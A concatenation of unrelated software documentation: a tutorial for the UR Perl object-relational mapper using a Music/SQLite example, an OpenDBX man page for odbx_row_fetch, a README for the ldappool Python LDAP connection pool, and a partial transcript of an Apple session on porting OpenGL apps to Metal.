    A   Music::Vocabulary (UR::Vocabulary)
    A   Music::DataSource::Meta (UR::DataSource::Meta)
    A   Music/DataSource/Meta.sqlite3-dump (Metadata DB skeleton)
showing that it created 3 classes for you, Music, Music::Vocabulary and Music::DataSource::Meta, and shows what classes those inherit from. In addition, it has also created a file to hold your metadata. Other parts of the documentation give a more thorough description of Vocabulary and Metadata classes.
A UR DataSource is an object representing the location of your data. It's roughly analogous to a Schema class in DBIx::Class, or the "Base class" in Class::DBI.
Note: Because UR can be used with objects which do NOT live in a database, using a data source is optional, but is the most common case.
Most ur commands operate in the context of a Namespace, including the one to create a datasource, so you need to be within the Music's Namespace's directory:
cd Music
and then define the datasource. We specify the data source's type as a sub-command, and the name with the --dsname argument. For this example, we'll use a brand new SQLite database. For some other, perhaps already existing database, give its connect string instead.
ur define db dbi:SQLite:/var/lib/music.sqlite3 Example
which generates this output:
    A   Music::DataSource::Example (UR::DataSource::SQLite,UR::Singleton)
    ...connecting... ....ok
and creates a symlink to the database at: Music/DataSource/Example.sqlite3
and shows that it created a class for your data source called Music::DataSource::Example, which inherits from UR::DataSource::SQLite. It also created an empty database file and connected to it to confirm that everything is OK.
Here are the table creation statements for our example database. Put them into a file with your favorite editor and call it example-db.schema.txt:
    CREATE TABLE artist (
        artist_id INTEGER NOT NULL PRIMARY KEY,
        name TEXT NOT NULL
    );

    CREATE TABLE cd (
        cd_id INTEGER NOT NULL PRIMARY KEY,
        artist_id INTEGER NOT NULL
            CONSTRAINT CD_ARTIST_FK REFERENCES artist(artist_id),
        title TEXT NOT NULL,
        year INTEGER
    );

    CREATE TABLE track (
        track_id INTEGER NOT NULL PRIMARY KEY,
        cd_id INTEGER NOT NULL
            CONSTRAINT TRACK_CD_FK REFERENCES cd(cd_id),
        title TEXT NOT NULL
    );
This new SQLite data source assumes the database file will have the pathname Music/DataSource/Example.sqlite3. You can populate the database schema like this:
sqlite3 DataSource/Example.sqlite3 < example-db.schema.txt
Now we're ready to create the classes that will store your data in the database.
You could write those classes by hand, but it's easiest to start with an autogenerated group built from the database schema:
ur update classes-from-db
is the command that performs all the magic. You'll see it go through several steps.
There will now be a Perl module for each database table. For example, in Cd.pm:
    package Music::Cd;

    use strict;
    use warnings;

    use Music;

    class Music::Cd {
        table_name => 'CD',
        id_by => [
            cd_id => { is => 'INTEGER' },
        ],
        has => [
            artist => { is => 'Music::Artist', id_by => 'artist_id', constraint_name => 'CD_ARTIST_FK' },
            artist_id => { is => 'INTEGER' },
            title => { is => 'TEXT' },
            year => { is => 'INTEGER', is_optional => 1 },
        ],
        schema_name => 'Example',
        data_source => 'Music::DataSource::Example',
    };

    1;
The first few lines are what you would see in any Perl module. The keyword class tells the UR system to define a new class, and lists the properties of the new class. Some of the important parts are that instances of this class come from the Music::DataSource::Example data source, in the table 'CD'. This class has 4 direct properties (cd_id, artist_id, title and year), and one indirect property (artist). Instances are identified by the cd_id property.
Methods are automatically created to match the property names. If you have an instance of a CD, say $cd, you can get the value of the title with $cd->title. To get back the artist object that is related to that CD, call $cd->artist.
Creating new object instances is done with the create method; its arguments are key-value pairs of properties and their values.
    #!/usr/bin/perl

    use strict;
    use Music;

    my $obj1 = Music::Artist->create(name => 'Elvis');
    my $obj2 = Music::Artist->create(name => 'The Beatles');

    UR::Context->commit();
And that's it. After this script runs, there will be 2 rows in the Artist table.
Just a short aside about that last line... All the changes to your objects while the program runs (creates, updates, deletes) exist only in memory. The current "Context" manages that knowledge. Those changes are finally pushed out to the underlying data sources with that last line.
Retrieving object instances from the database is done with the get() method. A get() with no arguments will return a list of all the objects in the table.
@all_cds = Music::Cd->get();
If you know the "id" (primary key) value of the objects you're interested in, you can pass that "id" value as a single argument to get:
$cd = Music::Cd->get(3);
An arrayref of identity values can be passed in as well. Note that if your query is going to return more than one item and it is called in scalar context, it will generate an exception.
@some_cds = Music::Cd->get([1, 2, 4]);
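For instance, here is a minimal illustration of that context rule (the filter values are hypothetical):

    # Scalar context: fine if at most one CD matches,
    # but raises an exception if several do.
    my $cd = Music::Cd->get(title => 'Abbey Road');

    # List context: safe for any number of matches.
    my @cds = Music::Cd->get(year => 1969);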
To filter the return list by a property other than the ID property, give a list of key-value pairs:
@some_cds = Music::Cd->get(artist_id => 3);
This will return all the CDs with the artist ID 5, 6 or 10.
@some_cds = Music::Cd->get(artist_id => [5, 6, 10]);
get() filters support operators other than strict equality. This will return a list of CDs that have artist ID 2 and the word 'Ticket' somewhere in the title.
@some_cds = Music::Cd->get(artist_id => 2, title => { operator => 'like', value => '%Ticket%' });
To search for NULL fields, use undef as the value:
@cds_with_no_year = Music::Cd->get(year => undef);
get_or_create() is used to retrieve an instance from the database if it exists, or create a new one if it does not.
$possibly_new = Music::Artist->get_or_create(name => 'The Band');
All the properties of an object are also mutators. To change the object's property, just call the method for that property with the new value.
$cd->year(1990);
Remember that any changes made while the program runs are not saved in the database until you commit the changes with UR::Context->commit.
The delete() method does just what it says.
    @all_tracks = Music::Track->get();
    foreach my $track ( @all_tracks ) {
        $track->delete();
    }
Again, the corresponding database rows will not be removed until you commit.
After you run ur update classes, it will automatically create indirect properties for all the foreign keys defined in the schema, but not for the reverse relationships. You can add other relationships in yourself and they will persist even after you run ur update classes again. For example, there is a foreign key that forces a track to be related to one CD. If you edit the file Cd.pm, you can define a relationship so that CDs can have many tracks:
    class Music::Cd {
        table_name => 'CD',
        id_by => [
            cd_id => { is => 'INTEGER' },
        ],
        has => [
            artist => { is => 'Music::Artist', id_by => 'artist_id', constraint_name => 'CD_ARTIST_FK' },
            artist_id => { is => 'INTEGER' },
            title => { is => 'TEXT' },
            year => { is => 'INTEGER' },
            tracks => { is => 'Music::Track', reverse_as => 'cd', is_many => 1 },  # This is the new line
        ],
        schema_name => 'Example',
        data_source => 'Music::DataSource::Example',
    };
This tells the system that there is a new property called 'tracks' which returns items of the class Music::Track. It links them to the acting CD object through the Track's cd property.
After that is in place, you can ask for a list of all the tracks belonging to a CD with the line
@tracks = $cd->tracks()
You can also define indirect relationships through other indirect relationships. For example, if you edit Artist.pm to add a couple of lines:
    class Music::Artist {
        table_name => 'ARTIST',
        id_by => [
            artist_id => { is => 'INTEGER' },
        ],
        has => [
            name => { is => 'TEXT' },
            cds => { is => 'Music::Cd', reverse_as => 'artist', is_many => 1 },
            tracks => { is => 'Music::Track', via => 'cds', to => 'tracks', is_many => 1 },
        ],
        schema_name => 'Example',
        data_source => 'Music::DataSource::Example',
    };
This defines a relationship 'cds' to return all the CDs from the acting artist. It also defines a relationship called 'tracks' that will, behind the scenes, first look up all the CDs from the acting artist, and then find and return all the tracks from those CDs.
Additional arguments can be passed to these indirect accessors to get a subset of the data
@cds_in_1990s = $artist->cds(year => { operator => 'between', value => [1990,1999] } );
would get all the CDs from that artist where the year is between 1990 and 1999, inclusive.
Note that is_many relationships should always be named with plural words. The system will auto-create other accessors based on the singular name for adding and removing items in the relationship. For example:
$artist->add_cd(year => 1998, title => 'Cool Jams' );
would create a new Music::Cd object with the given year and title. The cd_id will be autogenerated by the system, and the artist_id will be automatically set to the artist_id of $artist.
It's possible to use get() with custom SQL to retrieve objects, as long as the select clause includes all the ID properties of the class. To find Artist objects that have no CDs, you might do this:
    my @artists_with_no_cds = Music::Artist->get(
        sql => 'select artist.artist_id, count(cd.artist_id)
                from artist
                left join cd on cd.artist_id = artist.artist_id
                group by artist.artist_id
                having count(cd.artist_id) = 0'
    );
odbx_row_fetch man page
odbx_row_fetch — Retrieve rows from the result set
Synopsis
#include <opendbx/api.h>
int odbx_row_fetch
(odbx_result_t* result);
Description
Retrieves the values of a row from the current result set returned by odbx_result(). Until this function is invoked, no row and field data is available via odbx_field_length() or odbx_field_value(), and these functions will return zero and NULL, respectively.
Moreover, it is necessary to fetch all rows from a result set until zero is returned, indicating that no more rows are available. Otherwise, depending on the backend, an error may occur the next time odbx_result() is called, or the outstanding rows will be returned within the next result.
odbx_row_fetch() requires a valid result object which was created by odbx_result(). It must not have been fed to odbx_result_finish() before.
Return Value
odbx_row_fetch() will return ODBX_ROW_NEXT ("1") as long as rows are available from the result set. After the last row has been made available, further calls to this function will return ODBX_ROW_DONE ("0"), indicating that the result set doesn't contain more rows. The named constants are available since OpenDBX 1.3.2; the numbers in brackets have to be used instead if a previous release is the basis for the application development.
In case of an error, values less than zero are returned, encoding the reason why the error occurred.
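Example

A minimal fetch loop might look like this. It is a sketch, assuming handle is a connected odbx_t* whose statement was already sent via odbx_query(), with error handling elided:

    #include <stdio.h>
    #include <opendbx/api.h>

    void dump_results(odbx_t* handle)
    {
        odbx_result_t* result;

        /* Process every result set produced by the statement. */
        while (odbx_result(handle, &result, NULL, 0) > 0) {

            /* Fetch rows until ODBX_ROW_DONE ("0") is returned. */
            while (odbx_row_fetch(result) == ODBX_ROW_NEXT) {
                for (unsigned long i = 0; i < odbx_column_count(result); i++) {
                    const char* value = odbx_field_value(result, i);
                    printf("%s\t", value ? value : "NULL");
                }
                printf("\n");
            }

            odbx_result_finish(result);
        }
    }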
Errors
ODBX_ERR_PARAM

    The result parameter is either NULL or the object is invalid. This is usually the case if result has already been fed to odbx_result_finish().
See Also
odbx_column_count(), odbx_column_name(), odbx_column_type(), odbx_error(), odbx_error_type(), odbx_field_length(), odbx_field_value(), odbx_result()
A simple connector pool for python-ldap.
The pool
You need python-ldap in order to use this library.
Quickstart
To work with the pool, you just need to create it, then use it as a context manager with the connection method:
    from ldappool import ConnectionManager

    cm = ConnectionManager('ldap://localhost')

    with cm.connection('uid=adminuser,ou=logins,dc=mozilla', 'password') as conn:
        .. do something with conn ..
The connector returned by connection() is an LDAPObject that's bound to the server. See the python-ldap documentation for details on how to use a connector.
It is possible to check the state of the pool by representing the pool as a string:
    from ldappool import ConnectionManager

    cm = ConnectionManager('ldap://localhost', size=2)

    .. do something with cm ..

    print(cm)
This will result in output similar to this table:
    +--------------+-----------+----------+------------------+--------------------+------------------------------+
    | Slot (2 max) | Connected | Active   | URI              | Lifetime (600 max) | Bind DN                      |
    +--------------+-----------+----------+------------------+--------------------+------------------------------+
    | 1            | connected | inactive | ldap://localhost | 0.00496101379395   | uid=tuser,dc=example,dc=test |
    | 2            | connected | inactive | ldap://localhost | 0.00532603263855   | uid=tuser,dc=example,dc=test |
    +--------------+-----------+----------+------------------+--------------------+------------------------------+
ConnectionManager options
Here are the options you can use when instantiating the pool:
uri: ldap server uri [mandatory]
bind: default bind that will be used to bind a connector. default: None
passwd: default password that will be used to bind a connector. default: None
size: pool size. default: 10
retry_max: number of attempts when a server is down. default: 3
retry_delay: delay in seconds before a retry. default: .1
use_tls: activate TLS when connecting. default: False
timeout: connector timeout. default: -1
use_pool: activates the pool. If False, will recreate a connector each time. default: True
The uri option will accept a comma or whitespace separated list of LDAP server URIs to allow for failover behavior when connection errors are encountered. Connections will be attempted against the servers in order, with retry_max attempts per URI before failing over to the next server.
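For example, a pool configured for failover across two servers might look like this (hostnames and credentials are placeholders):

    import ldap
    from ldappool import ConnectionManager

    # Servers are tried in order; each URI gets up to retry_max
    # attempts before the pool fails over to the next one.
    cm = ConnectionManager(
        'ldap://ldap1.example.com ldap://ldap2.example.com',
        retry_max=2,
        retry_delay=0.5,
        size=5,
    )

    with cm.connection('uid=adminuser,ou=logins,dc=mozilla', 'password') as conn:
        # conn is a python-ldap LDAPObject, so the usual calls apply.
        conn.search_s('dc=mozilla', ldap.SCOPE_SUBTREE, '(uid=tuser)')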
The connection method takes two options:
bind: bind used to connect. If None, uses the pool default’s. default: None
passwd: password used to connect. If None, uses the pool default’s. default: None
Bringing OpenGL Apps to Metal
Metal is the modern foundation for GPU-accelerated graphics and compute on Apple platforms, superseding OpenGL, OpenGL ES, and OpenCL. Get introduced to the architecture and feature set of Metal and learn a step-by-step approach for transitioning OpenGL-based apps to the Metal API.
Lionel Lemarie: Hi, folks.
Welcome to our Metal session. I'm Lionel. I'm in the GPU software performance team here at Apple. And with my friends Max and Sarah, we'll be guiding you through how to bring your OpenGL app to Metal. So last year we announced that OpenGL, OpenGL ES, and OpenCL are deprecated. They will continue to be supported in iOS 13 and macOS Catalina, but now is the time to move.
New projects should target Metal from their inception. But if you have an OpenGL app that you want to port to Metal, you've come to the right place. So we first introduced Metal in 2014 as our new low-overhead, high-efficiency, high-performance GPU programming API. Over the past five years, Apple's core frameworks have adopted Metal and they're getting really great results. If your application is built on top of layers like SpriteKit, SceneKit, RealityKit, Core Image, Core Animation, then you're already using Metal. We've also been working closely with vendors on engines like Unity, Unreal Engine 4, and Lumberyard to really take advantage of Metal.
If you're using one of these engines, you're already up to speed.
But if you've built your own renderer, then Metal gives you a lot of great benefits.
Metal combines the graphics of OpenGL and compute of OpenCL into a unified API.
It allows you to use multithread rendering in your application. Whenever there are CPU operations that need to take place that are expensive, we made sure that they happen as infrequently as possible to reduce overhead during your app's execution.
Metal's shading language is C++ based and all the shaders used in your application can be precompiled, making it easier to have a wide variety of material shaders, for example.
And last but not least, we have a full suite of debugging and optimization tools built right into Xcode. So once you have ported to Metal, you have full support to make your application even better. So let's dive in.
In this session we'll take a look at the different steps involved in migrating from GL into Metal, and we'll do that by comparing a typical GL app to a Metal app.
As an overview, let's quickly look through the steps of our GL app.
First, you set up a window that you'll use for rendering. Then you create your resources like buffers, textures, samplers. You implement all your shaders written in GLSL. Before you can render anything in GL, you may have to create certain object states, such as GL programs, GL frame buffer objects, vertex array objects.
So once you've initialized your resources, the render loop starts and you draw your frames.
For each frame, you start by updating your resources, bind a specific frame buffer, set the graphic state, and make your draw calls. You repeat this process for each frame buffer you have. You may have shadow maps, a lighting pass, some post-processing. So potentially quite a few render passes.
And then finally, you present the final rendered image. It's pretty easy.
And as you can see, the Metal flow looks very similar. We updated some of the original concepts and introduced a few new things. But overall, the flow is much the same. It's not a complete rewrite of the engine; it works in the same manner. So we will reintroduce the new concepts while drawing parallels between GL and Metal, comparing and contrasting the two API's to help you successfully make the transition. When you're walking through any tutorial on graphics, then the first thing you learn is how to create and draw to a window. So let's start with the window subsystem. Both GL and Metal have this concept, but it's accomplished a little differently. The application is required to set up and present a drawing surface. And view and view delegates manage the interface between the API and the underlying window system. You might be using these frameworks to manage your GL views, so we have equivalent frameworks in Metal.
NSOpenGLView and GLKView map to MTKView. And if you are using Core Animation in your application with the EAGLLayer, then there's an equivalent CAMetalLayer.
As an example, let's say you are using GLKView. It has a single entry point, the draw rect. So you needed to check if the resolution of your target was unchanged since the last frame and update your render target sizes as needed, right from within the render loop. In MetalKit, it's a bit updated. There's a separate function for whenever the drawable needs to change, such as when you're rotating the screen or resizing your window. So you don't need to check if your resources need to be reallocated inside your draw function; it's dedicated to render code.
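A minimal Swift sketch of that split, assuming a hypothetical renderer class wired up as the view's delegate:

    import MetalKit

    class Renderer: NSObject, MTKViewDelegate {
        // Called when the window resizes or the device rotates:
        // reallocate size-dependent render targets here, once.
        func mtkView(_ view: MTKView, drawableSizeWillChange size: CGSize) {
            // rebuildRenderTargets(size: size)   // illustrative helper
        }

        // Called once per frame: pure render code, no size checks.
        func draw(in view: MTKView) {
            // encodeFrame(into: view)            // illustrative helper
        }
    }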
If you need additional flexibility, we provide the CAMetalLayer, which you use as the backing layer for your view. While the CAEAGLLayer defined the properties of your drawable such as its color format, the CAMetalLayer allows you to set up your drawable size, pixel format, color space, and more. Importantly, the CAMetalLayer maintains a pool of textures, and you call nextDrawable to get the drawable to render your frame to.
It's an important concept that we'll revisit in a short while when it's time to present.
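A rough Swift sketch of that setup, assuming device is your MTLDevice and view is the view the layer backs:

    let metalLayer = CAMetalLayer()
    metalLayer.device = device
    metalLayer.pixelFormat = .bgra8Unorm
    metalLayer.drawableSize = view.bounds.size   // illustrative sizing

    // Each frame, pull the next texture from the layer's pool:
    if let drawable = metalLayer.nextDrawable() {
        // ... render into drawable.texture, then present it ...
    }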
So now we have a window. Next we're going to introduce some new concepts in Metal.
So the command queues, command buffers, command encoders. These objects work together in Metal to submit work to the GPU. They're new because the underlying glContexts managed the submission for you. GL is an implicit API, meaning that there is no code that tells GL when to schedule the work. As a developer, you have very little control about when graphics work really happens, such as when shaders are compiled, when resource storage is allocated, when validation occurs, or when work is actually submitted to the GPU.
The glContext is a big state machine, and a typical workflow would look like this. Your application creates a glContext, sets it on the thread, and then calls arbitrary GL commands. The commands are recorded by the context under the hood and would get executed at some point in time.
Let's take a closer look to see what actually goes on. Say your application just sent GL these calls, a few state changes, a few draw calls. In a perfect scenario, the context would translate this into GPU commands to fill up an internal buffer.
And then when it's full, it would send it to the GPU. If you insert a glFlush to enforce execution, you know for sure they'll be kicked off by that point.
But actually, the GPU could start execution at any point beforehand.
Alright. So, for example, if we change one draw call, introducing a new dependency, suddenly execution is kicked off at that point and you could experience massive stalls. So, again, when does work actually get submitted? It depends. And that was one of the downsides of OpenGL -- it wasn't consistent in performance. Any one small change could force you down a bad path.
Metal, on the other hand, is an explicit API, meaning the application gets to decide exactly what work goes to the GPU and when. Metal splits the concept of a glContext into a collection of internal working objects. The first object an app creates is a Metal device object, which is just an abstract representation of the GPU.
Then it creates a key object called a Metal command queue. The Metal command queue maintains the order of commands sent to the GPU by allocating command buffers to fill.
And a command buffer is simply a list of GPU commands your app will fill to send to the GPU for execution. So we saw this command buffer concept in GL -- in the GL example we just studied. Let's work with that command buffer from this point on.
But an app doesn't write the commands directly to the command buffer; instead, it creates a Metal command encoder. Let's look at the main three types of encoders.
The first one we'll use will be filled with blit commands that are used to copy resources around. The command encoder translates API calls into GPU instructions and then writes them to the command buffer. After a series of commands have been encoded, for example, a series of blits to copy resources, then your app will end encoding, which releases the encoder object. Additionally, Metal supports a compute encoder for parallel work that you would normally have done in OpenCL before.
You enqueue a number of kernels that get written to the command buffer and you end the encoder to release it. Lastly, let's use a render encoder for your familiar rendering commands. You enqueue your state changes and your draw calls and end the encoder. So here we have a command buffer full of different workloads, but the GPU hasn't done any work yet. Metal has created the objects and encoded commands all within the CPU. It's only after your application has finished encoding commands and explicitly committed the command buffer that the GPU begins to work and executes those commands. So now that we have encoded commands, let's now compare and contrast GL and Metal's command submissions.
In GL there's no direct control of when work gets submitted to the GPU -- you rely on big hammers like glFlush and glFinish to ensure command execution; glFlush submits the commands and pauses the CPU thread until they're scheduled, and glFinish pauses the CPU thread until the GPU is completely finished. Work can still get submitted at any time before these commands happen, introducing potential stalls and slowdowns.
And Metal has equivalent versions of these functions; you can still explicitly commit and wait for a command buffer to be scheduled or completed. But these wait commands are not recommended unless you absolutely need them. Instead, we suggest that you simply commit your command buffer and then add a callback so that your application can be notified later when the command buffer has been completed on the GPU.
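Putting those pieces together, a hedged Swift sketch of one submission (the render pass descriptor setup is elided):

    let device = MTLCreateSystemDefaultDevice()!
    let commandQueue = device.makeCommandQueue()!

    let commandBuffer = commandQueue.makeCommandBuffer()!

    // Encode a render pass into the command buffer.
    let encoder = commandBuffer.makeRenderCommandEncoder(descriptor: renderPassDescriptor)!
    // ... set state, issue draw calls ...
    encoder.endEncoding()

    // Prefer a callback over waitUntilCompleted so the CPU stays busy.
    commandBuffer.addCompletedHandler { _ in
        // The GPU has finished executing this command buffer.
    }
    commandBuffer.commit()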
This frees your CPU to continue doing other work. So now that we have reviewed command queue, command buffer, command encoder, let's move on and talk about resource creation. There are three main types of resources that any graphics app is likely to use: buffers, textures, and samplers. Let's take a look at buffers first. In GL, you have a buffer object and the memory associated with it. The API calls you use can modify the object state, the memory, or both together. So here, for example, glBufferData can be used to modify both the memory and the state of the object. The buffer dimensions can be modified again later by calling glBufferData, in which case the old object and its contents will be discarded internally by OpenGL. In Metal, the API to create and fill a buffer looks very similar, but the main difference lies in the fact that the produced object is immutable. If at any point you need to resize the buffer, you simply need to create a new one and discard the old one. Both OpenGL and Metal have ways to indicate how you intend to use an object; however, in GL the enum is simply a usage hint about how the data in a buffer object would be accessed. The driver uses that hint to decide where to allocate memory for the buffer, but there's no direct control over storage. OpenGL ultimately decides where to store the objects.
In Metal, the API allows you to specify a storage mode which maps to a specific memory allocation behavior. Metal gives you control, since you know best how your objects are going to be used. It's an important concept in object creation, so we'll come back to it in a short moment right after we look at texture API's.
In GL, each texture has an internal sampler object, and apps commonly set up sampling modes through that sampler. But you also have the option to create a separate sampler object outside of your texture. Here's an example for creating and binding your texture, setting up your sampler, and then finally filling in the data.
One thing worth mentioning is that GL has a lot of API calls to create initialized textures with data. It also has what are called named resource versions of the same API. There's even more API's when it comes to managing samplers.
The list just goes on and on. One of the design goals with Metal was to give a simpler API that would maintain all of the flexibility. So in Metal, texture and sampler objects are always separate and immutable after creation. To create a texture, we create a descriptor and set various properties to define the texture, like pixel format and dimensions, amongst others. Again, an important property we set is the storage mode, to specify where in memory to store the texture. And finally, we use that descriptor to create an immutable object. In a similar fashion, you start with a sampler descriptor, set its properties, and create the immutable sampler object.
It's pretty easy. To fill a texture's image data, we calculate the bytes per row.
And just like we did in OpenGL, we specify the region to load. Then we call the texture's replaceRegion method, which copies the data into the texture from a pointer we specify.
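In Swift, that whole sequence might be sketched like this (width, height, and pixelData are assumed inputs):

    // Describe the texture, including where it lives in memory.
    let descriptor = MTLTextureDescriptor.texture2DDescriptor(
        pixelFormat: .rgba8Unorm,
        width: width,
        height: height,
        mipmapped: false)
    descriptor.storageMode = .shared        // CPU- and GPU-visible

    let texture = device.makeTexture(descriptor: descriptor)!

    // Copy the image bytes in from the CPU.
    let bytesPerRow = 4 * width
    let region = MTLRegionMake2D(0, 0, width, height)
    texture.replaceRegion(region, mipmapLevel: 0,
                          withBytes: pixelData, bytesPerRow: bytesPerRow)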
Once you load your first texture, you're likely to observe that it's upside down.
That's because in Metal the texture coordinates are flipped on the y-axis compared to GL.
And it's also worth mentioning that Metal API's don't perform any pixelFormat transformation under the hood. So you need to upload your textures in the exact format that you intend to use. Now let's get back to storage modes.
As mentioned, in GL the driver has to make a best guess on how you wanted to use your resources. As a developer, you can provide hints in some cases, like when you created a buffer or by creating render buffer objects for frame buffer attachments.
But in all cases, these were still hints and the implementation details are hidden from you. A few minutes ago, we briefly saw the additional storage mode property in Metal that you can set on a texture descriptor and also when creating a buffer.
Let's look at the main use cases for those. The simplest option is to use shared storage mode, which gives both the CPU and GPU access to the resource.
For buffers, this means you get a pointer to the memory backing of the object.
For textures on iOS, this means you can call some easy-to-use functions to set and retrieve image data. You can also use a private storage mode, which gives the GPU exclusive access to the data. It allows Metal to apply some optimizations that it wouldn't normally have been able to use if the CPU had access to it.
But only the GPU can directly fill the contents of the data. So you can indirectly fill the data from the CPU by using a blitEncoder from a second intermediate resource that uses shared storage. On devices with dedicated video memory, setting the resource to use private storage allocates it in video memory only, single copy.
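That indirect fill could be sketched like this in Swift (vertexData and dataSize are assumed inputs):

    // GPU-only destination buffer for the static data.
    let privateBuffer = device.makeBuffer(length: dataSize,
                                          options: .storageModePrivate)!

    // CPU-visible staging buffer holding the source bytes.
    let stagingBuffer = device.makeBuffer(bytes: vertexData,
                                          length: dataSize,
                                          options: .storageModeShared)!

    // Blit from staging into private memory on the GPU.
    let commandBuffer = commandQueue.makeCommandBuffer()!
    let blitEncoder = commandBuffer.makeBlitCommandEncoder()!
    blitEncoder.copy(from: stagingBuffer, sourceOffset: 0,
                     to: privateBuffer, destinationOffset: 0,
                     size: dataSize)
    blitEncoder.endEncoding()
    commandBuffer.commit()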
On macOS there's a managed storage mode which allows both the CPU and GPU to access an object's data. And on systems with dedicated video memory, Metal may have to create a second mirrored memory backing for efficient access by both processors.
So because of this, explicit calls are necessary to ensure that your data is synchronized for CPU and GPU access, for example, using didModifyRange. So to recap, we reviewed some of the typical uses for each mode. On macOS you would use the private storage mode for static assets and your render targets. Your small dynamic buffers could use the shared storage mode.
And your larger buffers with small updates would use the managed storage mode.
On iOS, your static data and rendering targets can use the private storage mode.
And since our devices use unified memory, dynamic data of any size can use the shared storage mode and still get great performance. Next, let's talk about developing shaders for your graphics application and what API's you use to work with shaders. When it comes to shader compilation in GL, you have to create a shader object, replace the ShaderSource in the object, make just in time compilation, and verify that the compilation succeeded. And while this workflow has its benefits, your application had to pay the performance costs of compiling all your shaders every time. One of the key ways in which Metal achieves its efficiency is by doing work earlier and less frequently. At build time, Xcode will compile all the Metal ShaderSource files into a default Metal library file and place it in your app bundle for retrieval at runtime. So this removes the need to compile a lot of it at runtime and cuts the compilation time when your application runs in half. All you need to do is create a Metal library from a file bundled with your application and fetch the shader function from it.
In GL you use GLSL, which is based on the C programming language.
The Metal shading language or MSL is based on C++. So it should look reasonably familiar to most GL developers. Its foundation in C++ means that you can create classes, templates, and structs. You can define enums and namespaces.
And like GLSL, there are built-in vector and matrix types, and numerous built-in functions and operations commonly used for graphics. And there are classes to operate on textures that specify sampler state. Like Metal, MSL is also unified for graphics and compute. And finally, since shaders are pre-compiled, Xcode is able to give you errors, warnings, and guidance to help you debug at build time.
So let's take a look at actual code for MSL and compare it with GLSL.
We're going to walk through a simple vertex shader, GLSL on top, MSL on the bottom.
Let's start defining our shaders. These are the prototypes.
In GLSL, void main. There's nothing in the shader that specifies the shader stage.
It's purely determined by the shader type passed into the glCreateShader call.
In MSL the shader stage is explicitly specified in the shader code.
Here the vertex qualifier indicates that it will be executed for each vertex, generating per-vertex outputs. In GLSL, every shader entry point has to be called main and accept and return void. In MSL each entry point has a distinct name.
And when you're building shaders with Xcode, the compiler can resolve include statements in the preprocessing stage the same way it would do for regular C++ code. At runtime you can query functions by their distinct name from the precompiled Metal library.
Then let's talk about inputs. Because each entry point in GLSL is a main function with no arguments, all of the inputs are passed as global variables. This applies to both vertex attributes and uniform variables. In Metal all the inputs to the shader stage are arguments to the entry function. The double brackets declare C++ attributes. We'll look at them in a second. One of the inputs here that we have is a model view projection matrix. In OpenGL, your application had to be aware of the GLSL names within the C++ code in order to bind data to these variables.
And that made shader development error-prone. In MSL the uniform binding indices are explicitly controlled by the developer within the shader, so an application can bind directly to a specific slot. In the example here, slot number one. The keyword constant here indicates that the intention for the model view projection is to be uniform for all vertices. The other input to the shader is a set of vertex attributes. In GLSL you typically use separate attribute inputs.
The main difference here is that MSL uses a structure of your own design.
The stage_in keyword indicates that each invocation of the shader will receive its own arguments. Once you have all the inputs to the shaders set up, you can actually perform all the calculations. Then for the outputs, in GLSL the output is split between varying attributes like gl_TexCoord and predefined variables, in this case gl_Position. In MSL, the vertex shader output is combined into your own structure. So we've used a vertex and vertex output structure. Let's scroll up in the MSL code to see what they actually look like. As mentioned previously, GLSL defines the input vertex attributes separately, and Metal allows you to define them within a structure.
In MSL there are a few special keywords for vertex shader input.
We mark each structure member with an attribute keyword and assign an attribute index to it.
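As a hedged MSL sketch of what such structures and an entry point can look like (the types, names, and indices are illustrative, not the session's actual code):

    #include <metal_stdlib>
    using namespace metal;

    struct VertexInput {
        float3 position [[attribute(0)]];
        float2 texCoord [[attribute(1)]];
    };

    struct VertexOutput {
        float4 position [[position]];   // transformed vertex position
        float2 texCoord;
    };

    vertex VertexOutput vertexShader(VertexInput in [[stage_in]],
                                     constant float4x4 &mvp [[buffer(1)]])
    {
        VertexOutput out;
        out.position = mvp * float4(in.position, 1.0);
        out.texCoord = in.texCoord;
        return out;
    }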
Similar to GLSL, these indices are used in the Metal API to assign the vertex buffer streams to your vertex attributes. And GLSL predefines special keywords like gl_Position to indicate which variable contains vertex coordinates that have been transformed with the model view projection matrix. Similarly, for the vertex output structure in MSL, the special keyword position signals that the vertex shader output position is stored in that structure member. Similar to GLSL vector types, MSL defines a number of simd types via the simd.h header that can be shared between your CPU and GPU code.
But there's a few things you need to remember about them. Vector and matrix types in your buffers are aligned to 16 bytes or 8 bytes for half precision. So they're not necessarily packed, for example, a float3 has a size of 12 bytes but is aligned to 16 bytes.
This is to ensure that the data is aligned for optimal CPU and GPU access.
There are specific packed formats you can use if you need them.
But you will need to unpack them in the shader before using them. So we've just reviewed the main differences between GLSL and MSL. And to make this transition smooth and easy, my colleague Max will show you a really cool tool to help you breeze through it. Thank you.

Max: Good evening. Metal, it's not just an API and a shading language, it is also a powerful collection of tools. My name is Max, and I'm going to minimize your hassle porting to Metal. Let's take a look at this scene. This is the very first draw call from an old OpenGL demo that we here at Apple also ported to Metal.
It's drawing a model of a temple and a tree, both illuminated by a global light source.
Let's port the fragment shader together. So the very first thing I did, I just copy and pasted my entire old OpenGL code directly into my Metal shader file.
Based on this, I've already created my input structure, as well as my function prototype.
Let's begin. So what we are going to do is just copy and paste the contents of the main function directly into our Metal function. And here we see the very first powerful thing about Metal. Because the shader's precompiled, we are getting errors instantly. Let's take a closer look. Of course, the building vector types have different names now. So vec2 becomes a float2; the vec3 becomes the float3; and the vec4 becomes a float4. So we quickly fix that. The next error we are going to see is that like all of our input structures -- all of our global variables are now coming from our input structure. And because I just used a similar naming scheme, this is also very easy. And, of course, we have to do the exact same thing for our uniforms. The next error is a little bit more complex.
Sampling in Metal is different, so let's take a look. We are going to start from scratch. So we directly can call a sample function on our colorMap.
And here we can see how powerful it is to have full auto completion.
So this function expects us to put in a sampler and a texture coordinate.
We already have the texture coordinate. We could pass in the sampler as an argument to our function or, conveniently in Metal, we can just declare one in code like this. We need to do the exact same thing for our normalMap.
The last error that we are seeing is that we are writing into, like, one of many OpenGL magic variables. Instead, we are just going to return our final computed color.
We can also see that all the other functions, like normalize, dot product, and my favorite function max, are still exactly the same. Our shader now compiled successfully. Let's run it. Something went wrong.
In OpenGL when you're experiencing an error with your shader, what you usually do is, like, you look at your source code, you look at your output, and you think really hard.
We're just going to use the shader debugger instead. Clicking on the little camera icon in the debug area will capture a GPU trace. This is a recording of every Metal API call we made. And we can now navigate to our draw calls.
Here we are drawing the tree. And here we are drawing the temple.
Let me long press on the stairs of the temple to bring up the pixel inspector, which allows us to start the shader debugger. What we are seeing here now is the values per line for the code that we have ported together and for the pixel we have just selected.
